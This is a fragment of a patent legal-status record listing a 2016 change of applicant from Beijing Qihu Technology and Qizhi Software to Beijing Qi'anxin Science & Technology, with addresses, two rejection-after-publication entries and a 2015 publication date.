Effective date of registration: 20161123 Address after: 100088 Jiuxianqiao Chaoyang District Beijing Road No. 10, building 15, floor 17, layer 1701-26, 3 Applicant after: BEIJING QI'ANXIN SCIENCE & TECHNOLOGY CO., LTD. Address before: 100088 Beijing city Xicheng District xinjiekouwai Street 28, block D room 112 (Desheng Park) Applicant before: Beijing Qihu Technology Co., Ltd. Applicant before: Qizhi Software (Beijing) Co., Ltd. |
|
| RJ01 | Rejection of invention patent application after publication | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20150401 |